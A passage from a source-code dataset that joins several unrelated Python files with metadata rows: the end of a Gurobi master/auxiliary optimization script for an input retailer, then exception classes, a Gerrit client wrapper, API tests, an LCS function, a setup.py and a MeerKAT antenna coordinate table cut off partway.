    TODO(review): an original comment suggested the inner sum should run
    over Nj instead of j.
    """
    handles = {
        hour: auxiliar.addConstr(
            costF[hour]
            == quicksum(
                inputBlockF[frw, pwb] * priceBlock[frw, pwb]
                for frw in f
                for pwb in j
            )
        )
        for hour in t
    }
    auxiliar.update()
#3. The input purchased in each block is non-negative and bounded by an upper limit.
def constraint3(upperPriceForward):
    """Constraint (3): the input purchased in each block of each forward
    contract is non-negative and bounded above by the block limit.

    Bug fix: the upper-bound constraint handles were being stored back into
    ``ctr3a``, clobbering the lower-bound handles, while ``ctr3b`` stayed
    empty; they are now stored in ``ctr3b``.
    """
    # Lower bounds: block purchases cannot be negative.
    ctr3a = {}
    for pwb in j:
        for frw in f:
            ctr3a[pwb,frw] = auxiliar.addConstr(inputBlockF[frw,pwb] >= 0)
    auxiliar.update()
    # Upper bounds: block purchases cannot exceed the block capacity.
    ctr3b = {}
    for pwb in j:
        for frw in f:
            ctr3b[pwb,frw] = auxiliar.addConstr(
                inputBlockF[frw,pwb] <= upperPriceForward[frw,pwb])
    auxiliar.update()
#4. The input purchased for each contract is the sum of the input purchased in each block
def constraint4():
    """Constraint (4): the total amount bought from each forward contract is
    the sum of the amounts bought in its price blocks.
    """
    handles = {
        contract: auxiliar.addConstr(
            inputTotalF[contract]
            == quicksum(inputBlockF[contract, block] for block in j)
        )
        for contract in f
    }
    auxiliar.update()
#The price-quota curve for each farmer group in each period and scenario can be formulated as follows:
#5. Pool related
def constraint5(PricePool):
    """Constraint (5): the net cost of trading in the pool in each period and
    scenario is the pool price times the quantity traded.
    """
    handles = {
        (hour, scen): auxiliar.addConstr(
            costP[hour, scen] == PricePool[hour, scen] * inputP[hour, scen]
        )
        for hour in t
        for scen in omega
    }
    auxiliar.update()
#7.A[l,i] is a set of binary variables that identify the interval of the price-quota curve corresponding to the selling price cRl
def constraint7():
    """Constraint (7): the selling price settled for each client group equals
    the sum of the per-interval prices of its price-quota curve.
    """
    handles = {
        client: auxiliar.addConstr(
            gammaSellingR[client]
            == quicksum(gammaPriceR[client, interval] for interval in i)
        )
        for client in l
    }
    auxiliar.update()
#11. The revenue obtained from selling input to the farmers is calculated from the following expression. Employment of a stepwise price-quota curve allows expressing the revenue as a linear constraint
def constraint11(inputBlock):
    """Constraint (11): linearized revenue -- the revenue obtained from each
    client group in each period and scenario equals the demand of every
    interval of the price-quota curve times that interval's price.
    """
    handles = {
        (hour, client, scen): auxiliar.addConstr(
            INR[client, hour, scen]
            == quicksum(
                inputBlock[client, interval, hour, scen]
                * gammaPriceR[client, interval]
                for interval in i
            )
        )
        for hour in t
        for client in l
        for scen in omega
    }
    auxiliar.update()
def solutionAuxiliar():
    """Print the auxiliar problem's solution (prices, revenues, forward
    purchases and pool trades) when the model solved to optimality.

    NOTE(review): this function uses Python 2 print statements, so the file
    only runs under Python 2. Also, the printed quicksum(...) calls build
    LinExpr objects over *solution values*; what gets printed is the str of
    that expression -- verify this is the intended output format.
    """
    if auxiliar.status == GRB.Status.OPTIMAL:
        print('-|--|--|--|--|--|--|--|--|--|')
        # Retailer's settled prices per price-quota interval.
        gammaPriceRx = auxiliar.getAttr('x', gammaPriceR)
        print('\nVariables de decision:')
        # Print the variable result for the price settled.
        print("\nPrecio establecido por el intermediador")
        print("Se tiene un solo precio por bloque de la curva de demanda")
        for client in l:
            print "Cliente " + str(client) + str(quicksum(gammaPriceRx[client,bg] for bg in i))
        # Revenue obtained by the retailer, per scenario.
        INRX = auxiliar.getAttr('x',INR)
        print('\nGanancia obtenida por el intermediador')
        print('Esto se obtiene por escenario definido')
        for sc in omega:
            print "Escenario "+ str(sc) + str( quicksum(INRX[client,hour,sc] for client in l for hour in t))
        # Input purchased from each forward contract.
        inputTotalFx = auxiliar.getAttr('x', inputTotalF)
        print('\nCantidad de pesticidas (ton) comprados al mayorista')
        print('Esto se obtiene por contrato')
        for frw in f:
            print "Contrato " + str(frw) + "--> " + str(inputTotalFx[frw]) #IMPORTANT OUTPUT
        inputBlockFx = auxiliar.getAttr('x',inputBlockF)
        print('\nPrecio al que compra el intermediador por bloque')
        print('Se obtiene por contrato')
        for frw in f:
            print 'Contrato ' + str(frw) + '-->' + str( quicksum(inputBlockFx[frw,pb] for pb in j) )
        print('\nPrecio al que vende el intermediador por tipo de cliente')
        print('Se obtiene por tipo de cliente (creo)')
        # Pool trades per period and scenario.
        inputPFx = auxiliar.getAttr('x',inputP)
        for sc in omega:
            for hour in t:
                print 'Escenario -> ' + str(sc) +'->'+ str(inputPFx[hour,sc])
##################################################################################
#Constrains for the master problem
#9. change bg as string to int for iterate
def constraint9():
    """Constraint (9): exactly one interval of the price-quota curve is
    selected (A[l, i] = 1) for each client group.
    """
    handles = {
        client: master.addConstr(quicksum(A[client, blk] for blk in i) == 1)
        for client in l
    }
    master.update()
# # #14. conditional expression for calculate risk if there is unfulfilled profit
# Big-M constant used to activate/deactivate the risk constraints (14a/14b)
# through the binary variables k[scenario].
M = 1000000
def constraint14a():
    """Constraint (14a): big-M link between the per-scenario risk and the
    indicator k[scenario] (k = 0 when the targeted profit is met).

    Bug fix: the original used a Python chained comparison
    ``0 <= expr <= M * (1 - k)``. Python evaluates that as
    ``(0 <= expr) and (expr <= M * (1 - k))``; with gurobipy operands the
    ``and`` discards one of the two temporary constraints, so only a single
    side ever reached addConstr. Both sides are now added explicitly.
    """
    for scenario in omega:
        master.addConstr(riskScenario[scenario] - (targetedProfit) >= 0)
        master.addConstr(
            riskScenario[scenario] - (targetedProfit) <= M * (1 - k[scenario]))
    master.update()
def constraint14b():
    """Constraint (14b): big-M bound 0 <= riskScenario <= M * k for each
    scenario, expressed as two explicit one-sided constraints.

    Bug fix: same chained-comparison problem as constraint14a -- the original
    single addConstr call could only register one side of the range.
    """
    for scenario in omega:
        master.addConstr(riskScenario[scenario] >= 0)
        master.addConstr(riskScenario[scenario] <= (M * k[scenario]))
    master.update()
def optimizeMaster():
    """Build the master objective, add the master constraints (9, 14a, 14b)
    and optimize the master model.

    NOTE(review): the loop below overwrites the entries of ``foMaster``
    (Gurobi Vars created with master.addVars) with LinExpr objects, so the
    original Vars are never constrained. Each per-scenario expression also
    sums over *all* scenarios, so every entry is identical -- verify intent.
    """
    # master objective function
    # 12a. auxiliar variable for the profit for scenario
    for scenario in omega:
        foMaster[scenario] = quicksum(inputBlock[client,bg,hour,sc]*A[client,bg] for client in l for bg in i for hour in t for sc in omega)
    # - inputBlockF[frw,pwb]*priceBlock[frw,pwb]
    # - inputP[hour,sc]*PricePool[hour,sc] for frw in f for pwb in j for hour in t for hour in t for client in l for bg in i for sc in omega)
    # NOTE(review): the bare quicksum below builds an expression that is
    # immediately discarded -- dead code with no effect on the model.
    quicksum(scenarioProb[sc] * quicksum(
            (quicksum(inputBlock[client,bg,hour,sc]*gammaPriceR[client,bg] for client in l for bg in i)
            - quicksum(inputP[hour,sc]*PricePool[hour,sc] for hour in t for sc in omega)
            - quicksum(inputBlockF[frw,pwb]*priceBlock[frw,pwb] for frw in f for pwb in j))
        for hour in t)
        for sc in omega)
    objFuncMaster = LinExpr()
    # # #12. The expected profit of retailer which is equal to the expected revenue obtained from selling inputs to the end-users and to the pool minus the expected cost of purchasing inputs from the pool and through forward contracts as follows:
    objFuncMaster += quicksum(scenarioProb[sc] * foMaster[sc] for sc in omega)
    constraint9()
    constraint14a()
    constraint14b()
    master.update()
    master.setObjective(objFuncMaster,GRB.MAXIMIZE)
    master.Params.Presolve = 0
    master.optimize()
def solutionMaster():
    """Print the master solution and copy the chosen price-quota blocks
    (binary A values) into the global ``Aconstant`` for use by addCuts.

    NOTE(review): uses Python 2 print statements (Python 2 only file).
    """
    if master.status == GRB.Status.OPTIMAL:
        print('-|--|--|--|--|--|--|--|--|')
        # Price-quota block selected by the retailer per client group.
        print('\nVariables de decision:')
        # Print the variable result for the price settled.
        Ax = master.getAttr('x', A)
        print("\nBloque ofrecido por el intermediador")
        print("Se tiene un solo precio por bloque de la curva de demanda por cliente")
        for client in l:
            for bg in i:
                print "Cliente " + str(client) + " " + "Curva (Binaria) " + str(bg) + ' -> ' +str(Ax[client,bg])
                # Freeze the master decision for the auxiliar subproblem.
                Aconstant[client,bg] = Ax[client,bg]
        # Risk level by scenario.
        riskScenariox = master.getAttr('x',riskScenario)
        print('\nNivel de riesgo por escenario')
        for sc in omega:
            print "Escenario "+ str(sc) + " ---> " + str(riskScenariox[sc])
def solveMaster():
    """Optimize the master problem and print its solution (this also fills
    the global ``Aconstant`` via solutionMaster)."""
    optimizeMaster()
    solutionMaster()
def solveAuxiliar():
    """Add the auxiliar-problem constraints, optimize it, and accumulate the
    expected downside risk (EDR) per scenario into the global EDRZ list.

    NOTE(review): several issues to verify --
    * the bare quicksum below is built and discarded (dead code);
    * the objective iterates ``for scenario in omega for sc in omega``, so
      each foAux[scenario] is weighted by *every* scenario probability;
    * foAux variables are never constrained, so the maximization over them
      is unbounded;
    * ``if foAux[scenario] <= targetedProfit`` compares a Gurobi Var to a
      float (not the solution value foAux[scenario].X);
    * dr/EDRS entries (Gurobi Vars) are overwritten with plain floats, and
      EDRZ grows across repeated calls.
    """
    constraint2(priceBlock)
    constraint3(upperPriceForward)
    constraint4()
    constraint5(PricePool)
    #constraint6(optimizeMaster,inputBlock)
    constraint7()
    #constraint8(upperPriceBlock)
    #constraint10(inputBlock)
    constraint11(inputBlock)
    #12a. auxiliar variable for the profit for scenario
    quicksum(scenarioProb[sc] * quicksum(
            (quicksum(inputBlock[client,bg,hour,sc]*gammaPriceR[client,bg] for client in l for bg in i)
            - quicksum(inputP[hour,sc]*PricePool[hour,sc] for hour in t for sc in omega)
            - quicksum(inputBlockF[frw,pwb]*priceBlock[frw,pwb] for frw in f for pwb in j))
        for hour in t)
        for sc in omega)
    auxiliar.update()
    #auxiliar Objective function
    objFuncAux = LinExpr()
    #12. The expected profit of retailer which is equal to the expected revenue obtained from selling inputs to the end-users and to the pool minus the expected cost of purchasing inputs from the pool and through forward contracts as follows:
    objFuncAux += quicksum(
        scenarioProb[sc] *
        foAux[scenario] for scenario in omega for sc in omega)
    auxiliar.update()
    #Optimice the auxiliar problem
    auxiliar.update()
    auxiliar.setObjective(objFuncAux,GRB.MAXIMIZE)
    auxiliar.Params.Presolve = 0
    auxiliar.optimize()
    #Calculate the EDR
    for scenario in omega:
        if foAux[scenario] <= targetedProfit:
            dr[scenario] = targetedProfit - foAux[scenario]
        else:
            dr[scenario] = 0
        EDRS[scenario] = scenarioProb[scenario] * dr[scenario]
        EDRZ.append(EDRS[scenario])
    return EDRZ
def addCuts(inputBlock,upperPriceBlock):
    """Add the master-decision-dependent constraints (6, 8, 10) to the
    auxiliar problem, using the frozen binaries in the global ``Aconstant``.
    """
    #The price-quota curve for each client group in each period and scenario can be formulated as follows:
    #6. The demand provided by the retailer is equal to the level of input of the price-quota curve indicated by binary variables
    ctr6 = {}
    for hour in t:
        for client in l:
            for sc in omega:
                ctr6[hour,client,sc] = auxiliar.addConstr(inputR[client,hour,sc] == quicksum(inputBlock[client,bg,hour,sc]*Aconstant[client,bg] for bg in i)) #need to changue the sumatory
    auxiliar.update()
    #8. Lower/upper bounds that tie the interval price to the selected block.
    ctr8A = {}
    for client in l:
        for bg in (bg1 for bg1 in i if bg1 > 1):
            ctr8A[client,bg] = auxiliar.addConstr(gammaPriceR[client,bg]
                >= upperPriceBlock[client,bg-1]*Aconstant[client,bg])
    ctr8B = {}
    for client in l:
        for bg in i:
            ctr8B[client,bg] = auxiliar.addConstr(gammaPriceR[client,bg] <= upperPriceBlock[client,bg]*Aconstant[client,bg])
    auxiliar.update()
    #10. The electric input balance of the retailer in each period and scenario is expressed as follows
    # NOTE(review): the factor Aconstant[client,bg] below sits *outside* the
    # quicksum and uses `client`/`bg` leaked from the previous loops (their
    # last values) -- this looks like a bug; it probably belongs inside the
    # quicksum over client and bg.
    ctr10 = {}
    for hour in t:
        for sc in omega:
            ctr10[hour,sc] = auxiliar.addConstr(
                quicksum(inputBlock[client,bg,hour,sc] for client in l for bg in i)*Aconstant[client,bg]
                >= (quicksum(inputP[hour,sc]+inputBlockF[frw,pwb] for frw in f for pwb in j)))
    auxiliar.update()
# ---------------------------------------------------------------------------
# Benders-style driver loop: alternately solve master and auxiliar problems
# and add cuts. NOTE(review): this file mixes Python 2 print statements with
# print() calls, so it only runs under Python 2.
# ---------------------------------------------------------------------------
print("PRIMERO HPTAAAAAAAAAAAAA")
solveMaster()
# print('\nAUXILIAR HPTAAAAAAAAAAAAA')
# solveAuxiliar()
# print("SEGUNDO HPTAAAAAAAAAAAAA")
# addCuts(inputBlock,upperPriceBlock)
# print('---*-*--*-*--*-*--*-*--*-*-Cortes aadidos -*-*--*-*--*-*--*-*-')
# solveAuxiliar()
while it < 10:
    print "Iteracion -------------------->> " + str(it)
    print('\nProblema Maestro')
    if master.status == GRB.Status.INFEASIBLE:
        print "Problema Maestro infactible, debe parar"
        v = master.getVars()
        break
    solveMaster()
    solveAuxiliar()
    if master.status == GRB.Status.OPTIMAL:
        print('\nProblema Auxiliar')
        solveAuxiliar()
        solutionAuxiliar()
    if auxiliar.status == GRB.Status.UNBOUNDED:
        print('\nModelo auxiliar no acotado')
        dualVariables = [c.Pi for c in auxiliar.getConstrs()]
        print('\nAnadiendo corte por factiblidad')
        # NOTE(review): `dualVariables <= 0` compares a Python *list* to an
        # int -- this is not a valid Gurobi constraint expression; the real
        # feasibility cut still needs to be formulated.
        master.addConstr(dualVariables <= 0) #quicksum(Fy[client,i] for client in l for bg in i)
        v = master.getVars()
        print(v[0].varName, v[0].x)
    if auxiliar.status == GRB.Status.INFEASIBLE:
        print('\nModelo auxiliar infactible')
        # NOTE(review): an infeasible model has no duals (c.Pi) nor ObjVal --
        # both lines below would raise at runtime; the optimality cut
        # `zlower >= dualVariables` (float vs list) is also malformed.
        dualVariables = [c.Pi for c in auxiliar.getConstrs()]
        zlower = auxiliar.ObjVal
        master.addConstr(zlower >= dualVariables)
        v = master.getVars()
        print(v[0].varName, v[0].x)
    it += 1
#try:
# while auxiliar.ObjVal != 0:
# it += 1
# print "Iteracion -------------------->> " + str(it)
# print('\nProblema Maestro')
# optimizeMaster()
# solutionMaster()
# print('\nProblema Auxiliar')
# optimizeAuxiliar()
# solutionAuxiliar()
#except AttributeError:
# print "Iteracion ------------------------>> " + str(it)
# if auxiliar.status == GRB.Status.UNBOUNDED:
# dualVariables = [c.Pi for c in auxiliar.getConstrs()]
# h = 1
# Fy = {}
# Ax = master.getAttr('x', A)
# for client in l:
# for bg in i:
# Fy[client,bg] = Ax[client,bg]
# factCuts ={}
# print('\nAnadiendo corte por factibilidad...')
# master.addConstr(dualVariables <= 0) #quicksum(Fy[client,i] for client in l for bg in i)
# print('\nResolviendo problema maestro...')
# optimizeMaster()
# solutionMaster()
| 42.757813 | 244 | 0.665997 |
2bf24d4d24a4a6440441ad109f12ea1939a2643c | 1,419 | py | Python | rabbitai/annotation_layers/commands/exceptions.py | psbsgic/rabbitai | 769e120ba605d56ac076f810a549c38dac410c8e | [
"Apache-2.0"
] | null | null | null | rabbitai/annotation_layers/commands/exceptions.py | psbsgic/rabbitai | 769e120ba605d56ac076f810a549c38dac410c8e | [
"Apache-2.0"
] | null | null | null | rabbitai/annotation_layers/commands/exceptions.py | psbsgic/rabbitai | 769e120ba605d56ac076f810a549c38dac410c8e | [
"Apache-2.0"
] | 1 | 2021-07-09T16:29:50.000Z | 2021-07-09T16:29:50.000Z | from flask_babel import lazy_gettext as _
from rabbitai.commands.exceptions import (
CommandException,
CommandInvalidError,
CreateFailedError,
DeleteFailedError,
ValidationError,
)
class AnnotationLayerInvalidError(CommandInvalidError):
    """Raised when annotation layer parameters fail validation."""
    message = _("Annotation layer parameters are invalid.")
class AnnotationLayerBulkDeleteFailedError(DeleteFailedError):
    """Raised when a bulk delete of annotation layers fails."""
    message = _("Annotation layer could not be deleted.")
class AnnotationLayerCreateFailedError(CreateFailedError):
    """Raised when creating an annotation layer fails."""
    message = _("Annotation layer could not be created.")
# NOTE(review): this update error inherits CreateFailedError -- it likely
# should derive from an UpdateFailedError base (not imported here); confirm
# against rabbitai.commands.exceptions.
class AnnotationLayerUpdateFailedError(CreateFailedError):
    """Raised when updating an annotation layer fails."""
    message = _("Annotation layer could not be updated.")
class AnnotationLayerNotFoundError(CommandException):
    """Raised when the requested annotation layer does not exist."""
    message = _("Annotation layer not found.")
class AnnotationLayerDeleteFailedError(CommandException):
    """Raised when deleting a single annotation layer fails."""
    message = _("Annotation layer delete failed.")
class AnnotationLayerDeleteIntegrityError(CommandException):
    """Raised when a delete is blocked by associated annotations."""
    message = _("Annotation layer has associated annotations.")
class AnnotationLayerBulkDeleteIntegrityError(CommandException):
    """Raised when a bulk delete is blocked by associated annotations."""
    message = _("Annotation layer has associated annotations.")
class AnnotationLayerNameUniquenessValidationError(ValidationError):
    """
    Marshmallow validation error for annotation layer name already exists
    """
    def __init__(self) -> None:
        super().__init__([_("Name must be unique")], field_name="name")
| 27.823529 | 73 | 0.776603 |
d60eca385da4b9e81cf7cb5c5a37ef9d8ccc91b5 | 832 | py | Python | os_gov/gerrit.py | pyKun/os-gov | 0100d853916bd47ee89b2bc9d9a914484b5fb062 | [
"Apache-2.0"
] | null | null | null | os_gov/gerrit.py | pyKun/os-gov | 0100d853916bd47ee89b2bc9d9a914484b5fb062 | [
"Apache-2.0"
] | null | null | null | os_gov/gerrit.py | pyKun/os-gov | 0100d853916bd47ee89b2bc9d9a914484b5fb062 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#-*- coding:utf-8 -*-
# Author: Kun Huang <academicgareth@gmail.com>
from gerritlib import gerrit
from os_gov import utils
class Gerrit(gerrit.Gerrit):
    """Thin wrapper around gerritlib's Gerrit client, pre-configured for
    review.openstack.org and with group-membership listing support."""

    def __init__(self, username=None):
        """Connect to review.openstack.org as *username*, falling back to the
        locally configured gerrit user when none is given."""
        self.host = "review.openstack.org"
        # TODO mv get_gerrit_usename to shell.py later
        self.user = username if username else utils.get_gerrit_usename()
        super(Gerrit, self).__init__(hostname=self.host, username=self.user)

    def listMembers(self, group, recursive=False):
        """Return the parsed member list of *group*, descending into nested
        groups when *recursive* is True; return None when the group is not
        found or not visible."""
        flag = "--recursive " if recursive else ""
        cmd = "gerrit ls-members %s%s" % (flag, group)
        out, err = self._ssh(cmd)
        if out.strip() == "Group not found or not visible":
            return None
        return utils.parse_members(out)
| 32 | 76 | 0.635817 |
f7d29c4a6104c291a57b5e0647183a6bf9f5b3c7 | 1,696 | py | Python | oriskami/test/resources/test_event_queue.py | oriskami/oriskami-python | 2b0d81f713a9149977907183c67eec136d49ee8c | [
"MIT"
] | 4 | 2017-05-28T19:37:31.000Z | 2017-06-13T11:34:26.000Z | oriskami/test/resources/test_event_queue.py | ubivar/ubivar-python | 2b0d81f713a9149977907183c67eec136d49ee8c | [
"MIT"
] | null | null | null | oriskami/test/resources/test_event_queue.py | ubivar/ubivar-python | 2b0d81f713a9149977907183c67eec136d49ee8c | [
"MIT"
] | null | null | null | import os
import oriskami
import warnings
from oriskami.test.helper import (OriskamiTestCase)
class OriskamiAPIResourcesTests(OriskamiTestCase):
    """Integration tests for the EventQueue API resource (these hit the live
    oriskami backend configured by OriskamiTestCase)."""

    def test_event_queue_retrieve(self):
        """Retrieving events 1-3 returns the expected active queue (or none)."""
        response = oriskami.EventQueue.retrieve("1")
        event = response.data[0]
        self.assertEqual(event["id"], "1")
        self.assertEqual(event.queues.active, "rules_base")
        response = oriskami.EventQueue.retrieve("2")
        event = response.data[0]
        self.assertEqual(event["id"], "2")
        self.assertEqual(event.queues.active, "peer_review")
        response = oriskami.EventQueue.retrieve("3")
        event = response.data[0]
        self.assertEqual(event["id"], "3")
        self.assertEqual(event.queues, None)
    def test_event_queue_update(self):
        """Updating the active queue round-trips (custom -> base)."""
        eventId = "1"
        response = oriskami.EventQueue.update(eventId, active="rules_custom")
        self.assertEqual(response.data[0].id, eventId)
        self.assertEqual(response.data[0].queues.active, "rules_custom")
        response = oriskami.EventQueue.update(eventId, active="rules_base")
        self.assertEqual(response.data[0].queues.active, "rules_base")
    def test_event_queue_delete(self):
        """Deleting removes the active queue; a later update restores it."""
        eventId = "1"
        response = oriskami.EventQueue.delete(eventId)
        self.assertFalse(hasattr(response.data[0].queues, "active"))
        response = oriskami.EventQueue.update(eventId, active="rules_base")
        self.assertTrue(hasattr(response.data[0].queues, "active"))
        self.assertEqual(response.data[0].queues.active, "rules_base")
    def test_event_queue_list(self):
        """Listing returns exactly two event-queue entries."""
        response = oriskami.EventQueue.list()
        self.assertTrue(len(response.data) == 2)
fdcf3311a01778c76a4352a35142d4bd206ca6d9 | 2,029 | py | Python | dynamic_programming/longest_common_subsequence.py | JB1959/Python | b6ca263983933c3ecc06ed0083dd11b6faf870c8 | [
"MIT"
] | 145,614 | 2016-07-21T05:40:05.000Z | 2022-03-31T22:17:22.000Z | dynamic_programming/longest_common_subsequence.py | Agha-Muqarib/Python | 04f156a8973d6156a4357e0717d9eb0aa264d086 | [
"MIT"
] | 3,987 | 2016-07-28T17:31:25.000Z | 2022-03-30T23:07:46.000Z | dynamic_programming/longest_common_subsequence.py | Agha-Muqarib/Python | 04f156a8973d6156a4357e0717d9eb0aa264d086 | [
"MIT"
] | 40,014 | 2016-07-26T15:14:41.000Z | 2022-03-31T22:23:03.000Z | """
LCS Problem Statement: Given two sequences, find the length of longest subsequence
present in both of them. A subsequence is a sequence that appears in the same relative
order, but not necessarily continuous.
Example:"abc", "abg" are subsequences of "abcdefgh".
"""
def longest_common_subsequence(x: str, y: str):
    """
    Finds the longest common subsequence between two strings. Also returns
    the subsequence found.

    Parameters
    ----------
    x: str, one of the strings
    y: str, the other string

    Returns
    -------
    dp[m][n]: int, the length of the longest subsequence. Also equal to
        len(seq)
    seq: str, the subsequence found

    >>> longest_common_subsequence("programming", "gaming")
    (6, 'gaming')
    >>> longest_common_subsequence("physics", "smartphone")
    (2, 'ph')
    >>> longest_common_subsequence("computer", "food")
    (1, 'o')
    """
    # find the length of strings
    assert x is not None
    assert y is not None

    m = len(x)
    n = len(y)

    # dp[i][j] holds the LCS length of the prefixes x[:i] and y[:j]
    dp = [[0] * (n + 1) for _ in range(m + 1)]

    for i in range(1, m + 1):
        for j in range(1, n + 1):
            match = 1 if x[i - 1] == y[j - 1] else 0
            dp[i][j] = max(dp[i - 1][j], dp[i][j - 1], dp[i - 1][j - 1] + match)

    # Backtrack to recover one LCS. Characters are collected in reverse and
    # joined once at the end (O(n)), instead of prepending to a string in
    # the loop (O(n^2)).
    chars = []
    i, j = m, n
    while i > 0 and j > 0:
        match = 1 if x[i - 1] == y[j - 1] else 0

        if dp[i][j] == dp[i - 1][j - 1] + match:
            if match == 1:
                chars.append(x[i - 1])
            i -= 1
            j -= 1
        elif dp[i][j] == dp[i - 1][j]:
            i -= 1
        else:
            j -= 1

    seq = "".join(reversed(chars))
    return dp[m][n], seq
if __name__ == "__main__":
    # Smoke test on the classic textbook example. The expected values were
    # previously computed but never checked; assert them now.
    a = "AGGTAB"
    b = "GXTXAYB"
    expected_ln = 4
    expected_subseq = "GTAB"
    ln, subseq = longest_common_subsequence(a, b)
    assert ln == expected_ln
    assert subseq == expected_subseq
    print("len =", ln, ", sub-sequence =", subseq)

    # Run the docstring examples as tests as well.
    import doctest

    doctest.testmod()
6bfbf0edfa99d96da5c57ef8cc9a6323bf23960e | 1,333 | py | Python | setup.py | asaskevich/binario | 8d40337952ab77f02da0edeae7fa761eadf6ab45 | [
"MIT"
] | 3 | 2017-06-24T16:00:15.000Z | 2020-12-02T15:53:35.000Z | setup.py | asaskevich/binario | 8d40337952ab77f02da0edeae7fa761eadf6ab45 | [
"MIT"
] | null | null | null | setup.py | asaskevich/binario | 8d40337952ab77f02da0edeae7fa761eadf6ab45 | [
"MIT"
] | 3 | 2015-08-13T08:33:41.000Z | 2018-03-04T21:42:41.000Z | from setuptools import setup
def readme():
    """Return the contents of README.rst (used as the long description).

    The file is read explicitly as UTF-8 so the build does not depend on the
    platform's default locale encoding.
    """
    with open('README.rst', encoding='utf-8') as f:
        return f.read()
# Distribution metadata for the binario package (executed on `python setup.py ...`).
setup(name='binario',
      version='0.0.4',
      description='Package that lets an application read/write primitive data ' +
                  'types from an underlying input/output stream as binary data.',
      long_description=readme(),
      url='http://github.com/asaskevich/binario',
      keywords='io input output file binary binario data',
      author='Alex Saskevich',
      author_email='bwatas@gmail.com',
      license='MIT',
      packages=['binario'],
      # Tests are collected and run with nose (python setup.py test).
      test_suite='nose.collector',
      tests_require=['nose'],
      download_url="https://pypi.python.org/pypi/binario",
      classifiers=[
          'Development Status :: 3 - Alpha',
          'Programming Language :: Python :: 3',
          'Programming Language :: Python :: 3.0',
          'Programming Language :: Python :: 3.1',
          'Programming Language :: Python :: 3.2',
          'Programming Language :: Python :: 3.3',
          'Programming Language :: Python :: 3.4',
          'Topic :: Software Development :: Libraries',
          'Topic :: Software Development :: Libraries :: Python Modules',
          'Topic :: System',
          'Topic :: System :: Filesystems',
          'Topic :: Utilities',
      ],
      zip_safe=False)
c1ac58198c5c7e0ba4ee91e480ca930e48aa3d11 | 4,340 | py | Python | data/T-RECS/MeerKAT.py | CosmoStat/ShapeDeconv | 3869cb6b9870ff1060498eedcb99e8f95908f01a | [
"MIT"
] | 4 | 2020-12-17T14:58:28.000Z | 2022-01-22T06:03:55.000Z | data/T-RECS/MeerKAT.py | CosmoStat/ShapeDeconv | 3869cb6b9870ff1060498eedcb99e8f95908f01a | [
"MIT"
] | 9 | 2021-01-13T10:38:28.000Z | 2021-07-06T23:37:08.000Z | data/T-RECS/MeerKAT.py | CosmoStat/ShapeDeconv | 3869cb6b9870ff1060498eedcb99e8f95908f01a | [
"MIT"
] | null | null | null | #! /usr/bin/python3
# -*- coding: utf-8 -*-
class MeerKATarray(object):
    """Static description of the MeerKAT radio telescope array: the antenna
    coordinate table and the geographic location of the site.

    numpy and astropy are imported lazily, inside __init__.
    """

    def __init__(self):
        import numpy as np
        from astropy.coordinates import EarthLocation
        import astropy.units as u

        # Antenna coordinate table as a (3, N) array: row 0, row 1 and row 2
        # are the three spatial components, one column per antenna.
        # NOTE(review): presumably geocentric (ECEF) XYZ in metres -- the
        # magnitudes are consistent with the site location below, but
        # confirm against the code that consumes this table.
        self.Array=np.array([[ 5109271.49735416,  5109284.85407754,  5109272.1993435 ,
         5109294.92858499,  5109291.9021494 ,  5109233.71782573,
         5109209.26348941,  5109148.3563611 ,  5109180.03524117,
         5109093.55655612,  5109170.18055871,  5109142.24732406,
         5109095.43320709,  5109130.11047997,  5109186.74678517,
         5109174.26788279,  5109240.95388574,  5109212.2308251 ,
         5109170.17197292,  5109190.13422423,  5109319.27502221,
         5109501.27803052,  5109415.83816637,  5109563.6943163 ,
         5109409.88085549,  5109340.50686944,  5109343.51732174,
         5109339.74820941,  5109357.50532698,  5109320.53511894,
         5109280.81866453,  5109561.41124047,  5109223.0447991 ,
         5109141.20538522,  5109088.62895199,  5109012.51005451,
         5109021.19439314,  5109040.86390684,  5109158.68572906,
         5109280.35702671,  5109533.61299471,  5109972.69938675,
         5110157.09530499,  5110723.7009419 ,  5109331.7459565 ,
         5111655.26092217,  5110888.06656438,  5109713.65348687,
         5109311.35148968,  5109039.4227322 ,  5108748.65570024,
         5108814.45202929,  5108974.66330238,  5109003.20020234,
         5110793.52095214,  5109608.66590919,  5108382.61808825,
         5107254.01347188,  5108278.55916154,  5108713.98241022,
         5109748.52632071],
       [ 2006808.89302781,  2006824.22172353,  2006783.54604995,
         2006755.50985406,  2006692.96802726,  2006783.34519269,
         2006697.07228302,  2006668.92154865,  2006816.61011285,
         2006842.5269473 ,  2006868.23609545,  2006917.43739644,
         2007003.01945823,  2007063.78075524,  2007010.79288481,
         2007089.17193214,  2007020.24474701,  2006908.08257804,
         2006961.46137943,  2006890.0451634 ,  2006518.56060045,
         2006507.28233036,  2006528.18913299,  2006555.38709425,
         2006765.75924307,  2006888.36185406,  2006791.07431684,
         2006749.21628934,  2007035.57284496,  2007101.93689326,
         2007317.01340668,  2007555.5082679 ,  2007183.16215354,
         2007181.46662131,  2007163.07668579,  2007124.61491175,
         2006948.62994241,  2006698.32802902,  2006464.53114915,
         2006432.6365746 ,  2006244.02924612,  2006130.37573833,
         2005196.44300058,  2005811.69710478,  2006220.13139806,
         2004739.74954867,  2003578.58732047,  2004786.46861502,
         2005919.93511349,  2006089.30840302,  2006622.47104818,
         2007575.08416726,  2007992.33987636,  2008429.66935399,
         2007732.1493962 ,  2009964.63970196,  2010429.23248703,
         2009699.35721797,  2006410.13690606,  2005051.01654913,
         2003331.23203868],
       [-3239130.73614072, -3239100.12646042, -3239145.33004168,
        -3239126.26624966, -3239169.94641344, -3239206.81520042,
        -3239299.36668257, -3239413.45218346, -3239272.32242145,
        -3239393.92388052, -3239256.01206258, -3239270.0825518 ,
        -3239292.08731167, -3239199.22441129, -3239141.50848633,
        -3239112.93487932, -3239049.21915551, -3239164.38124624,
        -3239198.49211401, -3239210.78638671, -3239233.61957711,
        -3238950.54476697, -3239073.85646735, -3238821.56314329,
        -3238936.95141411, -3238971.92750107, -3239026.97172989,
        -3239058.76457829, -3238853.87633838, -3238871.33463575,
        -3238800.99879004, -3238207.17422081, -3238977.04746739,
        -3239108.90628107, -3239203.63040132, -3239349.23577353,
        -3239443.49706673, -3239566.50339235, -3239522.08840298,
        -3239348.22709537, -3239061.14460898, -3238431.52176684,
        -3238718.84306904, -3237438.29057988, -3239396.7638735 ,
        -3236633.10524755, -3238574.25451153, -3239676.24008691,
        -3239613.47504072, -3239941.07331375, -3240077.32054145,
        -3239384.66757419, -3238870.28669984, -3238550.47820352,
